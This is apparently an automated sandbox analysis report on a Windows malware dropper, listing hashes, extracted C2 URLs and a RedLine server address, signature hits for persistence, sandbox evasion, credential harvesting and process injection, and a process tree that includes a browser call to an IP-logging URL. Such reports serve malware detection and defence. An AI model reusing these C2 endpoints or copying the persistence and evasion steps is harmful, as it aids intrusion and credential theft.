Analysis
- max time kernel: 99s
- max time network: 158s
- platform: windows10-2004_x64
- resource: win10v2004-en-20220113
- submitted: 10-03-2022 20:23
Static task: static1
Behavioral task: behavioral1
- Sample: 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe
- Resource: win7-20220310-en
Behavioral task: behavioral2
- Sample: 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe
- Resource: win10v2004-en-20220113
General
- Target: 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe
- Size: 4.2MB
- MD5: 256f52afa96f131dfdb397a93fb74852
- SHA1: b2bebbce4a9804258cc4b6ad62a16cab80728587
- SHA256: 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31
- SHA512: 0a3c4452cf1c1b6be951f5c9fe1da2b527ba47e1a1538d8d8566bb1188f442401a06187bb6ecaa939b954519dbc618fbed16e214acd58b53b081db46ba7a896d
Malware Config

Extracted: socelars
- http://www.iyiqian.com/
- http://www.xxhufdc.top/
- http://www.uefhkice.xyz/
- http://www.wygexde.xyz/

Extracted: smokeloader
- 2020
- http://conceitosseg.com/upload/
- http://integrasidata.com/upload/
- http://ozentekstil.com/upload/
- http://finbelportal.com/upload/
- http://telanganadigital.com/upload/

Extracted: redline
- dadad123
- 86.107.197.196:63065
- auth_value: dd4834614a3ac04a7b90791c224626a2
Signatures

DcRat (10 IoCs)
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
description | ioc | process
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Windows Defender\\es-ES\\RuntimeBroker.exe\"" | fhvct4NKRv1MuwyM8AyODJx_.exe
- pid 5932 | schtasks.exe
- pid 4700 | schtasks.exe
- pid 5340 | schtasks.exe
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" | pzyh.exe
- pid 5940 | schtasks.exe
- pid 484 | schtasks.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe
- pid 4240 | schtasks.exe
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Admin\\My Documents\\conhost.exe\"" | fhvct4NKRv1MuwyM8AyODJx_.exe
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
Process spawned unexpected child process (4 IoCs)
This typically indicates the parent process was compromised via an exploit or macro.
description | pid | pid_target | process | target process
- Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 4240 | 3884 | schtasks.exe |
- Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5940 | 3884 | schtasks.exe |
- Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 484 | 3884 | schtasks.exe |
- Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process | 5932 | 3884 | schtasks.exe |
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine Payload (12 IoCs)
resource | yara_rule
- behavioral2/memory/5476-398-0x0000000000DE0000-0x0000000001142000-memory.dmp | family_redline
- behavioral2/memory/5476-394-0x0000000000DE0000-0x0000000001142000-memory.dmp | family_redline
- behavioral2/memory/5476-393-0x0000000000DE0000-0x0000000001142000-memory.dmp | family_redline
- behavioral2/memory/5476-403-0x0000000000DE0000-0x0000000001142000-memory.dmp | family_redline
- behavioral2/memory/5852-412-0x0000000000A90000-0x0000000000DD5000-memory.dmp | family_redline
- behavioral2/memory/5836-411-0x00000000003C0000-0x0000000000705000-memory.dmp | family_redline
- behavioral2/memory/5836-426-0x00000000003C0000-0x0000000000705000-memory.dmp | family_redline
- behavioral2/memory/5852-428-0x0000000000A90000-0x0000000000DD5000-memory.dmp | family_redline
- behavioral2/memory/5852-431-0x0000000000A90000-0x0000000000DD5000-memory.dmp | family_redline
- behavioral2/memory/5836-414-0x00000000003C0000-0x0000000000705000-memory.dmp | family_redline
- behavioral2/memory/5476-406-0x0000000000DE0000-0x0000000001142000-memory.dmp | family_redline
- behavioral2/memory/5288-405-0x0000000000080000-0x00000000000A0000-memory.dmp | family_redline
SmokeLoader
Modular backdoor trojan in use since 2014.
Socelars Payload (2 IoCs)
resource | yara_rule
- C:\Users\Admin\AppData\Local\Temp\Installation.exe | family_socelars
- C:\Users\Admin\AppData\Local\Temp\Installation.exe | family_socelars
OnlyLogger Payload (4 IoCs)
resource | yara_rule
- behavioral2/memory/4268-172-0x0000000000700000-0x0000000000730000-memory.dmp | family_onlylogger
- behavioral2/memory/4268-174-0x0000000000400000-0x00000000005E6000-memory.dmp | family_onlylogger
- behavioral2/memory/5636-409-0x0000000000630000-0x0000000000674000-memory.dmp | family_onlylogger
- behavioral2/memory/5636-419-0x0000000000400000-0x0000000000492000-memory.dmp | family_onlylogger
Downloads MZ/PE file
Executes dropped EXE (42 IoCs)
pid | process
- 3616 | Files.exe
- 3464 | KRSetp.exe
- 3804 | File.exe
- 3720 | Folder.exe
- 988 | Info.exe
- 4904 | File.exe
- 4268 | Install.exe
- 380 | jg3_3uag.exe
- 5116 | pzyh.exe
- 5080 | Installation.exe
- 4636 | pub2.exe
- 2716 | jfiag3g_gg.exe
- 2964 | jfiag3g_gg.exe
- 5404 | T0jlrpsGGUYr4eISutfzJGw3.exe
- 5472 | fhvct4NKRv1MuwyM8AyODJx_.exe
- 5476 | 8LYdi6ebdnfzHFB1_bWgzJGK.exe
- 5496 | vUSKLYkUlN7iZZdPiIOcfRq9.exe
- 5536 | 6mM5wc4MNICotg_rhaS83KUX.exe
- 5596 | iCvrT7Kt4p0VQnPOaAK1bUuw.exe
- 5636 | hxK9HRML3gADcksTmKKPtJTV.exe
- 5704 | 3zrdpp1YNurQ9BvFo_I16hXV.exe
- 5736 | xnPfNBTqQGpxzwtTAJgl0Pwi.exe
- 5832 | DyxVIXsNsKer_eZTImK_hMIG.exe
- 5288 | XB562pl90hdu1ztAiENZv8ad.exe
- 5836 | gsRqUqtuYTRkYMiJYJ0ZdsHq.exe
- 5852 | xtqmxtTKWEfE8t8uqfXbvBNB.exe
- 5412 | 9FJLQu4A_WqLnwf6TNi2ThAm.exe
- 5352 | 75BsMTOUWXlbqzaIQpyJ6if7.exe
- 6020 | BJEsf_U8Nn986YcrD7DpuoI2.exe
- 3588 | QM0VjrM43wjfbjwxlnNpeiLt.exe
- 4048 | eYWJfcyLudf_is8eTK_AhCIG.exe
- 5432 | findstr.exe
- 6076 | Install.exe
- 5652 | KJAC6.exe
- 5320 | 3aa92756-575d-46ac-926b-6b220ed24ba3.exe
- 648 | BFE5C.exe
- 3440 | 57F2H.exe
- 5312 | Install.exe
- 4252 | 1CILB.exe
- 5336 | 1CILB33H9E8BCC5.exe
- 1804 | conhost.exe
- 2180 | Accostarmi.exe.pif
resource | yara_rule
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
- C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe | upx
resource | yara_rule
- C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe | vmprotect
- C:\Users\Admin\AppData\Local\Temp\jg3_3uag.exe | vmprotect
- behavioral2/memory/380-150-0x0000000000400000-0x0000000000648000-memory.dmp | vmprotect
Checks BIOS information in registry (2 TTPs, 1 IoCs)
BIOS information is often read in order to detect sandboxing environments.
description | ioc | process
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | Install.exe
Checks computer location settings (2 TTPs, 8 IoCs)
Looks up country code configured in the registry, likely geofence.
description | ioc | process
- Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | Files.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | Folder.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | File.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | 9FJLQu4A_WqLnwf6TNi2ThAm.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | iCvrT7Kt4p0VQnPOaAK1bUuw.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | fhvct4NKRv1MuwyM8AyODJx_.exe
- Key value queried | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Control Panel\International\Geo\Nation | Install.exe
Loads dropped DLL (15 IoCs)
pid | process
- 4636 | pub2.exe
- 3296 | rUNdlL32.eXe
- 5352 | 75BsMTOUWXlbqzaIQpyJ6if7.exe (11 entries)
- 5496 | vUSKLYkUlN7iZZdPiIOcfRq9.exe (2 entries)
Reads user/profile data of local email clients (2 TTPs)
Email clients store some user data on disk where infostealers will often target it.
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)
Adds Run key to start application (2 TTPs, 7 IoCs)
description | ioc | process
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\msedge = "\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.VisualElementsManifest\\msedge.exe\"" | fhvct4NKRv1MuwyM8AyODJx_.exe
- Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Roaming\\NVIDIA\\dllhost.exe" | 57F2H.exe
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.e" | pzyh.exe
- Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Windows\CurrentVersion\Run | msedge.exe
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\Program Files (x86)\\Windows Defender\\es-ES\\RuntimeBroker.exe\"" | fhvct4NKRv1MuwyM8AyODJx_.exe
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Users\\Admin\\My Documents\\conhost.exe\"" | fhvct4NKRv1MuwyM8AyODJx_.exe
- Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\conhost = "\"C:\\Windows\\System32\\cmmon32\\conhost.exe\"" | fhvct4NKRv1MuwyM8AyODJx_.exe
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.

description | ioc | process
- Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | jg3_3uag.exe
Legitimate hosting services abused for malware hosting/C2 (1 TTPs)
Looks up external IP address via web service (5 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
- 10 | ipinfo.io
- 11 | ipinfo.io
- 16 | ip-api.com
- 264 | ipinfo.io
- 265 | ipinfo.io
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
AutoIT Executable (2 IoCs)
AutoIT scripts compiled to PE executables.
resource | yara_rule
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe | autoit_exe
- C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe | autoit_exe
Drops file in System32 directory (3 IoCs)
description | ioc | process
- File created | C:\Windows\system32\GroupPolicy\gpt.ini | Install.exe
- File created | C:\Windows\SysWOW64\cmmon32\conhost.exe | fhvct4NKRv1MuwyM8AyODJx_.exe
- File created | C:\Windows\SysWOW64\cmmon32\088424020bedd6 | fhvct4NKRv1MuwyM8AyODJx_.exe
Suspicious use of NtSetInformationThreadHideFromDebugger (13 IoCs)
pid | process
- 5476 | 8LYdi6ebdnfzHFB1_bWgzJGK.exe
- 5472 | fhvct4NKRv1MuwyM8AyODJx_.exe
- 5836 | gsRqUqtuYTRkYMiJYJ0ZdsHq.exe
- 5852 | xtqmxtTKWEfE8t8uqfXbvBNB.exe
- 3588 | QM0VjrM43wjfbjwxlnNpeiLt.exe
- 5472 | fhvct4NKRv1MuwyM8AyODJx_.exe
- 5432 | findstr.exe
- 5652 | KJAC6.exe
- 648 | BFE5C.exe
- 3440 | 57F2H.exe
- 1804 | conhost.exe (3 entries)
Drops file in Program Files directory (7 IoCs)
description | ioc | process
- File opened for modification | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\20220310220156.pma | setup.exe
- File created | C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe | fhvct4NKRv1MuwyM8AyODJx_.exe
- File opened for modification | C:\Program Files (x86)\Windows Defender\es-ES\RuntimeBroker.exe | fhvct4NKRv1MuwyM8AyODJx_.exe
- File created | C:\Program Files (x86)\Windows Defender\es-ES\9e8d7a4ca61bd9 | fhvct4NKRv1MuwyM8AyODJx_.exe
- File created | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.VisualElementsManifest\msedge.exe | fhvct4NKRv1MuwyM8AyODJx_.exe
- File created | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.VisualElementsManifest\61a52ddc9dd915 | fhvct4NKRv1MuwyM8AyODJx_.exe
- File created | C:\Program Files (x86)\Microsoft\Edge\Application\SetupMetrics\82ae69f7-c77e-45e8-8dca-f53e134cfbb5.tmp | setup.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
Program crash (22 IoCs)
pid | pid_target | process | target process
- 1284 | 3296 | WerFault.exe | rUNdlL32.eXe
- 5584 | 5404 | WerFault.exe | T0jlrpsGGUYr4eISutfzJGw3.exe
- 3188 | 5536 | WerFault.exe | 6mM5wc4MNICotg_rhaS83KUX.exe
- 648 | 5636 | WerFault.exe | hxK9HRML3gADcksTmKKPtJTV.exe
- 5944 | 5736 | WerFault.exe | xnPfNBTqQGpxzwtTAJgl0Pwi.exe
- 836 | 5404 | WerFault.exe | T0jlrpsGGUYr4eISutfzJGw3.exe
- 2028 | 5536 | WerFault.exe | 6mM5wc4MNICotg_rhaS83KUX.exe
- 3120 | 5636 | WerFault.exe | hxK9HRML3gADcksTmKKPtJTV.exe
- 3180 | 5736 | WerFault.exe | xnPfNBTqQGpxzwtTAJgl0Pwi.exe
- 3244 | 5636 | WerFault.exe | hxK9HRML3gADcksTmKKPtJTV.exe
- 5264 | 5636 | WerFault.exe | hxK9HRML3gADcksTmKKPtJTV.exe
- 1688 | 5636 | WerFault.exe | hxK9HRML3gADcksTmKKPtJTV.exe
- 1848 | 5636 | WerFault.exe | hxK9HRML3gADcksTmKKPtJTV.exe
- 5472 | 5636 | WerFault.exe | hxK9HRML3gADcksTmKKPtJTV.exe
- 5244 | 5636 | WerFault.exe | hxK9HRML3gADcksTmKKPtJTV.exe
- 5264 | 5636 | WerFault.exe | hxK9HRML3gADcksTmKKPtJTV.exe
- 5776 | 4488 | WerFault.exe | explorer.exe
- 6072 | 1688 | WerFault.exe | explorer.exe
- 1308 | 4528 | WerFault.exe | notepad.exe
- 2648 | 5912 | WerFault.exe | notepad.exe
- 5840 | 5912 | WerFault.exe | notepad.exe
- 6088 | 4528 | WerFault.exe | notepad.exe
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | process
- Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe
- Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe
- Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | pub2.exe
Checks processor information in registry (2 TTPs, 4 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | process
- Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | 75BsMTOUWXlbqzaIQpyJ6if7.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | 75BsMTOUWXlbqzaIQpyJ6if7.exe
- Key opened | \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 | 3aa92756-575d-46ac-926b-6b220ed24ba3.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | 3aa92756-575d-46ac-926b-6b220ed24ba3.exe
Creates scheduled task(s) (1 TTPs, 6 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid | process
- 484 | schtasks.exe
- 5932 | schtasks.exe
- 4700 | schtasks.exe
- 5340 | schtasks.exe
- 4240 | schtasks.exe
- 5940 | schtasks.exe
Delays execution with timeout.exe (1 IoCs)
pid | process
- 5704 | timeout.exe
Enumerates processes with tasklist (1 TTPs, 2 IoCs)
pid | process
- 5956 | tasklist.exe
- 5400 | tasklist.exe
Enumerates system info in registry (2 TTPs, 5 IoCs)
description | ioc | process
- Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
- Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | Install.exe
- Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | Install.exe
Kills process with taskkill (3 IoCs)
pid | process
- 2300 | taskkill.exe
- 4680 | taskkill.exe
- 5688 | taskkill.exe
description | ioc | process
- Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | 1CILB33H9E8BCC5.exe
- Set value (str) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | 1CILB33H9E8BCC5.exe
- Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\Software\Microsoft\Internet Explorer\IESettingSync | 1CILB33H9E8BCC5.exe
- Set value (int) | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" | 1CILB33H9E8BCC5.exe
Modifies registry class (5 IoCs)
description | ioc | process
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ |
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ |
- Key created | \REGISTRY\USER\S-1-5-21-1346565761-3498240568-4147300184-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ |
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | Folder.exe
- Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | msedge.exe
Suspicious behavior: EnumeratesProcesses (64 IoCs)
pid | process
- 4636 | pub2.exe (2 entries)
- 4504 | msedge.exe (2 entries)
- 4344 | msedge.exe (2 entries)
- 2964 | jfiag3g_gg.exe (2 entries)
- 5096 | msedge.exe (2 entries)
- 2232 | (no process name recorded) (54 entries)
Suspicious behavior: MapViewOfSection (1 IoCs)
pid | process
- 4636 | pub2.exe
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary (5 IoCs)
pid | process
- 5096 | msedge.exe (5 entries)
Suspicious use of AdjustPrivilegeToken (64 IoCs)
description | pid | process
- Token: SeDebugPrivilege | 3464 | KRSetp.exe
- Token: SeCreateTokenPrivilege | 5080 | Installation.exe
- Token: SeAssignPrimaryTokenPrivilege | 5080 | Installation.exe
- Token: SeLockMemoryPrivilege | 5080 | Installation.exe
- Token: SeIncreaseQuotaPrivilege | 5080 | Installation.exe
- Token: SeMachineAccountPrivilege | 5080 | Installation.exe
- Token: SeTcbPrivilege | 5080 | Installation.exe
- Token: SeSecurityPrivilege | 5080 | Installation.exe
- Token: SeTakeOwnershipPrivilege | 5080 | Installation.exe
- Token: SeLoadDriverPrivilege | 5080 | Installation.exe
- Token: SeSystemProfilePrivilege | 5080 | Installation.exe
- Token: SeSystemtimePrivilege | 5080 | Installation.exe
- Token: SeProfSingleProcessPrivilege | 5080 | Installation.exe
- Token: SeIncBasePriorityPrivilege | 5080 | Installation.exe
- Token: SeCreatePagefilePrivilege | 5080 | Installation.exe
- Token: SeCreatePermanentPrivilege | 5080 | Installation.exe
- Token: SeBackupPrivilege | 5080 | Installation.exe
- Token: SeRestorePrivilege | 5080 | Installation.exe
- Token: SeShutdownPrivilege | 5080 | Installation.exe
- Token: SeDebugPrivilege | 5080 | Installation.exe
- Token: SeAuditPrivilege | 5080 | Installation.exe
- Token: SeSystemEnvironmentPrivilege | 5080 | Installation.exe
- Token: SeChangeNotifyPrivilege | 5080 | Installation.exe
- Token: SeRemoteShutdownPrivilege | 5080 | Installation.exe
- Token: SeUndockPrivilege | 5080 | Installation.exe
- Token: SeSyncAgentPrivilege | 5080 | Installation.exe
- Token: SeEnableDelegationPrivilege | 5080 | Installation.exe
- Token: SeManageVolumePrivilege | 5080 | Installation.exe
- Token: SeImpersonatePrivilege | 5080 | Installation.exe
- Token: SeCreateGlobalPrivilege | 5080 | Installation.exe
- Token: 31 | 5080 | Installation.exe
- Token: 32 | 5080 | Installation.exe
- Token: 33 | 5080 | Installation.exe
- Token: 34 | 5080 | Installation.exe
- Token: 35 | 5080 | Installation.exe
- Token: SeDebugPrivilege | 2300 | taskkill.exe
- Token: SeDebugPrivilege | 988 | Info.exe
- Token: SeShutdownPrivilege / SeCreatePagefilePrivilege (alternating) | 2232 | (no process name recorded) (27 entries)
Suspicious use of FindShellTrayWindow (24 IoCs)
pid | process
- 3804 | File.exe (9 entries)
- 5096 | msedge.exe (3 entries)
- 2180 | Accostarmi.exe.pif (3 entries)
- 2232 | (no process name recorded) (9 entries)
Suspicious use of SendNotifyMessage (12 IoCs)
pid | process
- 3804 | File.exe (9 entries)
- 2180 | Accostarmi.exe.pif (3 entries)
Suspicious use of SetWindowsHookEx (27 IoCs)
pid | process
- 4904 | File.exe
- 5404 | T0jlrpsGGUYr4eISutfzJGw3.exe
- 5472 | fhvct4NKRv1MuwyM8AyODJx_.exe
- 5496 | vUSKLYkUlN7iZZdPiIOcfRq9.exe
- 5476 | 8LYdi6ebdnfzHFB1_bWgzJGK.exe
- 5472 | fhvct4NKRv1MuwyM8AyODJx_.exe
- 5536 | 6mM5wc4MNICotg_rhaS83KUX.exe
- 5832 | DyxVIXsNsKer_eZTImK_hMIG.exe
- 5836 | gsRqUqtuYTRkYMiJYJ0ZdsHq.exe
- 5852 | xtqmxtTKWEfE8t8uqfXbvBNB.exe
- 5736 | xnPfNBTqQGpxzwtTAJgl0Pwi.exe
- 5412 | 9FJLQu4A_WqLnwf6TNi2ThAm.exe
- 5352 | 75BsMTOUWXlbqzaIQpyJ6if7.exe
- 6020 | BJEsf_U8Nn986YcrD7DpuoI2.exe
- 3588 | QM0VjrM43wjfbjwxlnNpeiLt.exe
- 5432 | findstr.exe
- 6076 | Install.exe
- 5652 | KJAC6.exe
- 648 | BFE5C.exe
- 3440 | 57F2H.exe
- 5312 | Install.exe
- 4252 | 1CILB.exe
- 1804 | conhost.exe
- 5336 | 1CILB33H9E8BCC5.exe
- 5336 | 1CILB33H9E8BCC5.exe
- 1804 | conhost.exe
- 2180 | Accostarmi.exe.pif
Suspicious use of WriteProcessMemory (64 IoCs)
description | pid | process | target process
- PID 2680 wrote to memory of 3616 | 2680 | 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe | Files.exe (3 entries)
- PID 2680 wrote to memory of 3464 | 2680 | 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe | KRSetp.exe (2 entries)
- PID 3616 wrote to memory of 3804 | 3616 | Files.exe | File.exe (3 entries)
- PID 2680 wrote to memory of 5096 | 2680 | 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe | msedge.exe (2 entries)
- PID 2680 wrote to memory of 3720 | 2680 | 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe | Folder.exe (3 entries)
- PID 5096 wrote to memory of 4516 | 5096 | msedge.exe | msedge.exe (2 entries)
- PID 2680 wrote to memory of 988 | 2680 | 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe | Info.exe (3 entries)
- PID 2680 wrote to memory of 4904 | 2680 | 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe | File.exe (3 entries)
- PID 2680 wrote to memory of 4268 | 2680 | 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe | Install.exe (3 entries)
- PID 2680 wrote to memory of 380 | 2680 | 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe | jg3_3uag.exe (3 entries)
- PID 2680 wrote to memory of 5116 | 2680 | 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe | pzyh.exe (3 entries)
- PID 2680 wrote to memory of 5080 | 2680 | 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe | Installation.exe (3 entries)
- PID 2680 wrote to memory of 4636 | 2680 | 4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe | pub2.exe (3 entries)
- PID 3720 wrote to memory of 3296 | 3720 | Folder.exe | rUNdlL32.eXe (3 entries)
- PID 5116 wrote to memory of 2716 | 5116 | pzyh.exe | jfiag3g_gg.exe (3 entries)
- PID 5080 wrote to memory of 4924 | 5080 | Installation.exe | cmd.exe (3 entries)
- PID 4924 wrote to memory of 2300 | 4924 | cmd.exe | taskkill.exe (3 entries)
- PID 3616 wrote to memory of 2768 | 3616 | Files.exe | msedge.exe (2 entries)
- PID 2768 wrote to memory of 2744 | 2768 | msedge.exe | msedge.exe (2 entries)
- PID 5096 wrote to memory of 4864 | 5096 | msedge.exe | msedge.exe (12 entries)
Processes
Process tree (indentation shows parent/child depth; each entry lists the image path, the command line, and the signatures triggered):

C:\Users\Admin\AppData\Local\Temp\4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\4b46898490db9f2c989bd246a04fcf44f1c82ffae9df8f1d31f7d5eccb62db31.exe"
  - DcRat
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  C:\Users\Admin\AppData\Local\Temp\Files.exe
    Command line: "C:\Users\Admin\AppData\Local\Temp\Files.exe"
    - Executes dropped EXE
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\File.exe"
      - Executes dropped EXE
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SendNotifyMessage
    C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://iplogger.org/1Rxji7
      - Suspicious use of WriteProcessMemory
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        Command line: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x100,0x104,0x108,0xd4,0x10c,0x7ffadc5b46f8,0x7ffadc5b4708,0x7ffadc5b4718
      C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
